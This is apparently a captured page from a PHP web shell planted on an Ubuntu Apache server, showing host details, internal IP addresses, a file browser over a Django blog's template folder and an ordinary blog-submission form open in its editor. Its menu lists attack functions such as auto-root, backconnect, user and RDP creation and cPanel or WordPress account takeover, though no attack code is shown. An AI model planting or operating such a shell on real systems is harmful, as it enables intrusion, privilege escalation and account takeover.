Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
blog /
templates /
blog /
[ HOME SHELL ]
Name
Size
Permission
Action
Navbar.html
1.37
KB
-rw-r--r--
addblog.html
1.95
KB
-rw-r--r--
blog_details.html
1.74
KB
-rw-r--r--
blog_list.html
1.91
KB
-rw-r--r--
blogprofile.html
0
B
-rw-r--r--
student_list.html
852
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : addblog.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Add a Blog</title> <script src="https://cdn.tailwindcss.com"></script> </head> <body class="bg-gray-100 flex items-center justify-center min-h-screen"> <div class="bg-white p-8 rounded-lg shadow-md w-full max-w-2xl"> <h1 class="text-2xl font-bold mb-6 text-center">📝 Add a New Blog</h1> <form method="POST" enctype="multipart/form-data" class="space-y-4"> {% csrf_token %} <!-- Blog Title --> <div> <label class="block text-gray-700 font-medium">Title</label> <input type="text" name="title" class="w-full p-2 border rounded-md focus:ring-2 focus:ring-blue-400" required> </div> <!-- Blog Content --> <div> <label class="block text-gray-700 font-medium">Content</label> <textarea name="content" rows="5" class="w-full p-2 border rounded-md focus:ring-2 focus:ring-blue-400" required></textarea> </div> <!-- Author Name --> <div> <label class="block text-gray-700 font-medium">Author Name</label> <input type="text" name="author" class="w-full p-2 border rounded-md focus:ring-2 focus:ring-blue-400" required> </div> <!-- Upload Image --> <div> <label class="block text-gray-700 font-medium">Upload Image</label> <input type="file" name="profile_photo" class="w-full p-2 border rounded-md focus:ring-2 focus:ring-blue-400" accept="image/*" required> </div> <!-- Submit Button --> <button type="submit" class="w-full bg-blue-600 text-white py-2 rounded-md hover:bg-blue-700 transition"> 📤 Submit Blog </button> </form> </div> </body> </html>
Close